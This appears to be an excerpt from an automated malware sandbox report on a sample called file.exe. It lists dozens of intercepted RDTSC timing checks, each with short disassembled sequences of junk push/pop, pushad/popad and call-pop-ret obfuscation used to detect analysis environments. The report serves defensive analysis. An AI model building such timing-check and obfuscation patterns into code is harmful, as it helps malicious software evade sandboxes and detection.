Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D35A3 second address: 9D35A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D3691 second address: 9D36B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC1350240D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D36B5 second address: 9D36BB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D3970 second address: 9D3976 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D3A34 second address: 9D3A3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D3A3A second address: 9D3A4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a jg 00007FC1350240C6h 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D3ECE second address: 9D3ED4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D3ED4 second address: 9D3F1A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007FC1350240C6h 0x00000009 jnc 00007FC1350240C6h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 mov dword ptr [esp], ebx 0x00000015 push 00000000h 0x00000017 push edx 0x00000018 call 00007FC1350240C8h 0x0000001d pop edx 0x0000001e mov dword ptr [esp+04h], edx 0x00000022 add dword ptr [esp+04h], 00000019h 0x0000002a inc edx 0x0000002b push edx 0x0000002c ret 0x0000002d pop edx 0x0000002e ret 0x0000002f mov edi, dword ptr [ebp+122D1A5Dh] 0x00000035 nop 0x00000036 pushad 0x00000037 je 00007FC1350240CCh 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D3F1A second address: 9D3F42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC134D1C057h 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push edi 0x00000015 pop edi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D4239 second address: 9D4262 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FC1350240D8h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push ecx 0x0000000d pushad 0x0000000e jg 00007FC1350240C6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D44A0 second address: 9D44A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D4911 second address: 9D4915 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D4915 second address: 9D4962 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007FC134D1C04Ch 0x0000000e push ecx 0x0000000f push edi 0x00000010 pop edi 0x00000011 pop ecx 0x00000012 popad 0x00000013 nop 0x00000014 mov dword ptr [ebp+122D1AA5h], esi 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push ebx 0x0000001f call 00007FC134D1C048h 0x00000024 pop ebx 0x00000025 mov dword ptr [esp+04h], ebx 0x00000029 add dword ptr [esp+04h], 00000014h 0x00000031 inc ebx 0x00000032 push ebx 0x00000033 ret 0x00000034 pop ebx 0x00000035 ret 0x00000036 push 00000000h 0x00000038 cld 0x00000039 jo 00007FC134D1C046h 0x0000003f xchg eax, ebx 0x00000040 pushad 0x00000041 pushad 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D4962 second address: 9D4984 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FC1350240C6h 0x0000000a popad 0x0000000b jmp 00007FC1350240CFh 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D4984 second address: 9D498A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D67F9 second address: 9D6814 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC1350240D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D6814 second address: 9D6818 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D71C4 second address: 9D71D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC1350240D0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D85B8 second address: 9D85BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D85BF second address: 9D85C4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D85C4 second address: 9D85FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jmp 00007FC134D1C056h 0x0000000f jne 00007FC134D1C046h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FC134D1C051h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D85FE second address: 9D867E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC1350240D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push eax 0x0000000e call 00007FC1350240C8h 0x00000013 pop eax 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 add dword ptr [esp+04h], 0000001Dh 0x00000020 inc eax 0x00000021 push eax 0x00000022 ret 0x00000023 pop eax 0x00000024 ret 0x00000025 mov di, D429h 0x00000029 mov dword ptr [ebp+122D2631h], ebx 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push ebp 0x00000034 call 00007FC1350240C8h 0x00000039 pop ebp 0x0000003a mov dword ptr [esp+04h], ebp 0x0000003e add dword ptr [esp+04h], 00000017h 0x00000046 inc ebp 0x00000047 push ebp 0x00000048 ret 0x00000049 pop ebp 0x0000004a ret 0x0000004b movsx edi, cx 0x0000004e push 00000000h 0x00000050 xor dword ptr [ebp+122D5660h], edx 0x00000056 xchg eax, ebx 0x00000057 push eax 0x00000058 push edx 0x00000059 jne 00007FC1350240C8h 0x0000005f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DB016 second address: 9DB067 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007FC134D1C059h 0x0000000d nop 0x0000000e push esi 0x0000000f movzx edi, si 0x00000012 pop edi 0x00000013 push 00000000h 0x00000015 jmp 00007FC134D1C04Eh 0x0000001a pushad 0x0000001b mov ch, E8h 0x0000001d movzx esi, cx 0x00000020 popad 0x00000021 push 00000000h 0x00000023 or esi, dword ptr [ebp+122D1FADh] 0x00000029 push eax 0x0000002a push eax 0x0000002b push edx 0x0000002c jnp 00007FC134D1C048h 0x00000032 pushad 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D97C0 second address: 9D97C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E07CA second address: 9E07F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC134D1C04Bh 0x00000007 jmp 00007FC134D1C058h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DA338 second address: 9DA341 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E07F1 second address: 9E0817 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC134D1C04Fh 0x00000009 jmp 00007FC134D1C053h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DADFC second address: 9DAE01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DB889 second address: 9DB88D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DAE01 second address: 9DAE06 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DE92A second address: 9DE997 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC134D1C057h 0x00000008 jmp 00007FC134D1C051h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f nop 0x00000010 mov di, 6DCFh 0x00000014 push dword ptr fs:[00000000h] 0x0000001b mov ebx, edx 0x0000001d mov dword ptr fs:[00000000h], esp 0x00000024 mov eax, dword ptr [ebp+122D0561h] 0x0000002a push 00000000h 0x0000002c push ebp 0x0000002d call 00007FC134D1C048h 0x00000032 pop ebp 0x00000033 mov dword ptr [esp+04h], ebp 0x00000037 add dword ptr [esp+04h], 0000001Ah 0x0000003f inc ebp 0x00000040 push ebp 0x00000041 ret 0x00000042 pop ebp 0x00000043 ret 0x00000044 mov dword ptr [ebp+122D2503h], esi 0x0000004a push FFFFFFFFh 0x0000004c mov bh, dl 0x0000004e nop 0x0000004f push eax 0x00000050 push edx 0x00000051 js 00007FC134D1C048h 0x00000057 push edx 0x00000058 pop edx 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DAE06 second address: 9DAE0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E2D93 second address: 9E2DEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 mov bh, 8Ah 0x0000000b push 00000000h 0x0000000d mov di, bx 0x00000010 mov di, 8868h 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push eax 0x00000019 call 00007FC134D1C048h 0x0000001e pop eax 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 add dword ptr [esp+04h], 0000001Dh 0x0000002b inc eax 0x0000002c push eax 0x0000002d ret 0x0000002e pop eax 0x0000002f ret 0x00000030 sub edi, dword ptr [ebp+122D28ECh] 0x00000036 xchg eax, esi 0x00000037 push ebx 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007FC134D1C053h 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E2DEB second address: 9E2DEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E3FCA second address: 9E3FCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E3FCE second address: 9E3FD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E5C90 second address: 9E5C94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E4F2B second address: 9E4F39 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E5C94 second address: 9E5D17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007FC134D1C057h 0x0000000d nop 0x0000000e jmp 00007FC134D1C052h 0x00000013 mov dword ptr [ebp+12461BA3h], ecx 0x00000019 push 00000000h 0x0000001b push edi 0x0000001c mov dword ptr [ebp+122D3793h], edi 0x00000022 pop edi 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push ebx 0x00000028 call 00007FC134D1C048h 0x0000002d pop ebx 0x0000002e mov dword ptr [esp+04h], ebx 0x00000032 add dword ptr [esp+04h], 0000001Ah 0x0000003a inc ebx 0x0000003b push ebx 0x0000003c ret 0x0000003d pop ebx 0x0000003e ret 0x0000003f mov bx, AD1Ch 0x00000043 cld 0x00000044 xchg eax, esi 0x00000045 push edx 0x00000046 jmp 00007FC134D1C04Fh 0x0000004b pop edx 0x0000004c push eax 0x0000004d pushad 0x0000004e push eax 0x0000004f push edx 0x00000050 pushad 0x00000051 popad 0x00000052 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E5D17 second address: 9E5D20 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E6CDD second address: 9E6CE3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E6CE3 second address: 9E6CF5 instructions: 0x00000000 rdtsc 0x00000002 js 00007FC1350240C8h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E6CF5 second address: 9E6CF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E6CF9 second address: 9E6D6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007FC1350240C8h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 00000014h 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 push 00000000h 0x00000024 cld 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push edx 0x0000002a call 00007FC1350240C8h 0x0000002f pop edx 0x00000030 mov dword ptr [esp+04h], edx 0x00000034 add dword ptr [esp+04h], 0000001Dh 0x0000003c inc edx 0x0000003d push edx 0x0000003e ret 0x0000003f pop edx 0x00000040 ret 0x00000041 mov ebx, dword ptr [ebp+122D29A4h] 0x00000047 movsx edi, ax 0x0000004a mov ebx, eax 0x0000004c xchg eax, esi 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007FC1350240D7h 0x00000054 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E6D6C second address: 9E6D89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC134D1C04Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jp 00007FC134D1C048h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E7D57 second address: 9E7DCF instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC1350240C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007FC1350240C8h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 00000016h 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 mov dword ptr [ebp+1245859Dh], edx 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push ebp 0x00000032 call 00007FC1350240C8h 0x00000037 pop ebp 0x00000038 mov dword ptr [esp+04h], ebp 0x0000003c add dword ptr [esp+04h], 00000017h 0x00000044 inc ebp 0x00000045 push ebp 0x00000046 ret 0x00000047 pop ebp 0x00000048 ret 0x00000049 mov edi, 6A131476h 0x0000004e push 00000000h 0x00000050 mov edi, 25DCCD45h 0x00000055 xor bh, FFFFFFFBh 0x00000058 xchg eax, esi 0x00000059 push ecx 0x0000005a push eax 0x0000005b push edx 0x0000005c jmp 00007FC1350240D3h 0x00000061 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E7DCF second address: 9E7DD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E6FB2 second address: 9E6FB8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E8E70 second address: 9E8E75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E9FC6 second address: 9EA032 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007FC1350240C6h 0x00000009 jp 00007FC1350240C6h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 mov dword ptr [esp], eax 0x00000015 push 00000000h 0x00000017 push ecx 0x00000018 call 00007FC1350240C8h 0x0000001d pop ecx 0x0000001e mov dword ptr [esp+04h], ecx 0x00000022 add dword ptr [esp+04h], 00000016h 0x0000002a inc ecx 0x0000002b push ecx 0x0000002c ret 0x0000002d pop ecx 0x0000002e ret 0x0000002f mov dword ptr [ebp+122D25FEh], eax 0x00000035 mov edi, dword ptr [ebp+122D3882h] 0x0000003b push 00000000h 0x0000003d movzx ebx, bx 0x00000040 push 00000000h 0x00000042 push 00000000h 0x00000044 push ecx 0x00000045 call 00007FC1350240C8h 0x0000004a pop ecx 0x0000004b mov dword ptr [esp+04h], ecx 0x0000004f add dword ptr [esp+04h], 00000019h 0x00000057 inc ecx 0x00000058 push ecx 0x00000059 ret 0x0000005a pop ecx 0x0000005b ret 0x0000005c xchg eax, esi 0x0000005d push edi 0x0000005e pushad 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E905D second address: 9E9067 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC134D1C046h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E9067 second address: 9E9071 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC1350240CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EB097 second address: 9EB09D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EB09D second address: 9EB0A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EBF7A second address: 9EBF7F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EB20C second address: 9EB210 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EBF7F second address: 9EBFE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007FC134D1C048h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 00000018h 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 and edi, dword ptr [ebp+122D2970h] 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push edx 0x0000002f call 00007FC134D1C048h 0x00000034 pop edx 0x00000035 mov dword ptr [esp+04h], edx 0x00000039 add dword ptr [esp+04h], 00000016h 0x00000041 inc edx 0x00000042 push edx 0x00000043 ret 0x00000044 pop edx 0x00000045 ret 0x00000046 mov dword ptr [ebp+122D2351h], ebx 0x0000004c push 00000000h 0x0000004e xchg eax, esi 0x0000004f push ecx 0x00000050 jp 00007FC134D1C04Ch 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EB210 second address: 9EB21A instructions: 0x00000000 rdtsc 0x00000002 js 00007FC1350240C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9ECFC9 second address: 9ECFD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007FC134D1C04Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EC14D second address: 9EC153 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A22F1E second address: A22F24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A22F24 second address: A22F2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A22F2C second address: A22F32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A22A52 second address: A22A6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 ja 00007FC134D1C052h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A22A6D second address: A22A71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A22A71 second address: A22A9A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC134D1C050h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC134D1C053h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A22A9A second address: A22A9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A22C08 second address: A22C2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 jmp 00007FC134D1C050h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push edx 0x00000011 pop edx 0x00000012 jo 00007FC134D1C046h 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A22C2E second address: A22C39 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007FC1350240C6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A22C39 second address: A22C42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A29837 second address: A29863 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC1350240CBh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FC1350240D7h 0x0000000e jp 00007FC1350240C6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A29863 second address: A2986D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC134D1C046h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2811C second address: A28120 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A28120 second address: A28141 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007FC134D1C046h 0x00000010 jmp 00007FC134D1C051h 0x00000015 rdtsc
